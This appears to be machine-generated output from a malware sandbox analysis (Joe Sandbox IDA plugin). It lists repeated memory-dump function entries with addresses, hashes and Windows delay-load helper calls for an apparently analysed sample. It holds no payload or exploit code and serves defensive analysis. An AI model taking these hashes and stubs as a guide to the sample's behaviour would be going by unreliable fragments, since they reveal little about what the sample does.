Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3666c71275f34606f5a0d3ba7db7c7031d3ca8160527d411c808e672d61287a1
Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
Opcode Fuzzy Hash: 3666c71275f34606f5a0d3ba7db7c7031d3ca8160527d411c808e672d61287a1
Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871

Function 00CCE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0bf90d08686c9c930a51d3f661ec329e26125bc4b249950e7c242cee2447debe
Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
Opcode Fuzzy Hash: 0bf90d08686c9c930a51d3f661ec329e26125bc4b249950e7c242cee2447debe
Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871

Function 00CCE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 54413d56ae9f1a28f56bbb7890c3339537e5cb61646cf1cb4a6d7a73df3afade
Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
Opcode Fuzzy Hash: 54413d56ae9f1a28f56bbb7890c3339537e5cb61646cf1cb4a6d7a73df3afade
Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871

Function 00CCE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6bf05e4e0ce9ecd9e1302834abb034ef47a54bdf7f08e6b53017908479547289
Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
Opcode Fuzzy Hash: 6bf05e4e0ce9ecd9e1302834abb034ef47a54bdf7f08e6b53017908479547289
Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871

Function 00CCE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6ae70d1ffd2c50a8a3667da5c3a672504070af05e108b49e5ad857cd2a6c4b66
Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
Opcode Fuzzy Hash: 6ae70d1ffd2c50a8a3667da5c3a672504070af05e108b49e5ad857cd2a6c4b66
Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871

Function 00CCE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2f73fc0d3a6c3f7d9c222b4c0697d0a3bfac184e115613d2a879017151cab376
Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
Opcode Fuzzy Hash: 2f73fc0d3a6c3f7d9c222b4c0697d0a3bfac184e115613d2a879017151cab376
Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871

Function 00CCE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: de764ce2ef632b26b3e35063d263154e75822ddef2112103bc2cff578fd4e934
Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
Opcode Fuzzy Hash: de764ce2ef632b26b3e35063d263154e75822ddef2112103bc2cff578fd4e934
Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871

Function 00CCE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eccaa91c88f840cd238cb038f62ecb2276e61c176e05102dc24bd4925b1baf56
Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
Opcode Fuzzy Hash: eccaa91c88f840cd238cb038f62ecb2276e61c176e05102dc24bd4925b1baf56
Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871

Function 00CCE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e466b1e89588e9c9227484345175491cb569233ad993720bccfd0c805bf89362
Instruction ID: d34bcb5a5d5507ac190010d61a35d336b0a9f2b49dc704c18e97222e1660dbd0
Opcode Fuzzy Hash: e466b1e89588e9c9227484345175491cb569233ad993720bccfd0c805bf89362
Instruction Fuzzy Hash: 30A001E62AA1D27D32186256AD47E3B121DC4C2B29334956EF825A54D1AC8028466876

Function 00CCE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1a85ddd33a73974083bed69e728fe122dae94ea5a57870bde1d1745383ad6992
Instruction ID: 044871182b1f52025d6b3745ef7d68a1cc9928a9773c23a182ebad8fb093c495
Opcode Fuzzy Hash: 1a85ddd33a73974083bed69e728fe122dae94ea5a57870bde1d1745383ad6992
Instruction Fuzzy Hash: 22A001E62AA1D2BC32186256AD47E3B121DC4C6B65334996EF816954D1A88028466876

Function 00CCE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a1fe3b340d30764793fce99c28aea32f3d5b721de3051b6625a8fa08670c550e
Instruction ID: 044871182b1f52025d6b3745ef7d68a1cc9928a9773c23a182ebad8fb093c495
Opcode Fuzzy Hash: a1fe3b340d30764793fce99c28aea32f3d5b721de3051b6625a8fa08670c550e
Instruction Fuzzy Hash: 22A001E62AA1D2BC32186256AD47E3B121DC4C6B65334996EF816954D1A88028466876

Function 00CCE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 68b50b2cdc5913d791b3effcd40dc1c67a469c4191e184938e6f585448aa60dc
Instruction ID: 044871182b1f52025d6b3745ef7d68a1cc9928a9773c23a182ebad8fb093c495
Opcode Fuzzy Hash: 68b50b2cdc5913d791b3effcd40dc1c67a469c4191e184938e6f585448aa60dc
Instruction Fuzzy Hash: 22A001E62AA1D2BC32186256AD47E3B121DC4C6B65334996EF816954D1A88028466876

Function 00CCE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aa9514fa592a8be745b50a8bb397f526d009a46f4415c66f5d1d96de1552c14f
Instruction ID: 044871182b1f52025d6b3745ef7d68a1cc9928a9773c23a182ebad8fb093c495
Opcode Fuzzy Hash: aa9514fa592a8be745b50a8bb397f526d009a46f4415c66f5d1d96de1552c14f
Instruction Fuzzy Hash: 22A001E62AA1D2BC32186256AD47E3B121DC4C6B65334996EF816954D1A88028466876

Function 00CCE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6c8fed27197bbc21c50c03f959084eca04c9db63a48e1e32ca5b0fbc227dbb2d
Instruction ID: 044871182b1f52025d6b3745ef7d68a1cc9928a9773c23a182ebad8fb093c495
Opcode Fuzzy Hash: 6c8fed27197bbc21c50c03f959084eca04c9db63a48e1e32ca5b0fbc227dbb2d
Instruction Fuzzy Hash: 22A001E62AA1D2BC32186256AD47E3B121DC4C6B65334996EF816954D1A88028466876

Function 00CCE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE580

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6dc4265e61829061ace338b5c1d1bc52fcbae35e181000a93448c0ffa4682e55
Instruction ID: 06df7a541ba0d0abfc4a5481f0a27e87c3c6e972da61af124abc49f64c10e235
Opcode Fuzzy Hash: 6dc4265e61829061ace338b5c1d1bc52fcbae35e181000a93448c0ffa4682e55
Instruction Fuzzy Hash: 5EA001D66AA192BC3108A2A7AD86E3B122DC4C6B69331992EF816854C1A89818566971

Function 00CCE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE580

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 17be6f579c796bb566e87dbedcdcd01c0c3f869179a5b38a02d605a290bc1c84
Instruction ID: 06df7a541ba0d0abfc4a5481f0a27e87c3c6e972da61af124abc49f64c10e235
Opcode Fuzzy Hash: 17be6f579c796bb566e87dbedcdcd01c0c3f869179a5b38a02d605a290bc1c84
Instruction Fuzzy Hash: 5EA001D66AA192BC3108A2A7AD86E3B122DC4C6B69331992EF816854C1A89818566971

Function 00CCE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
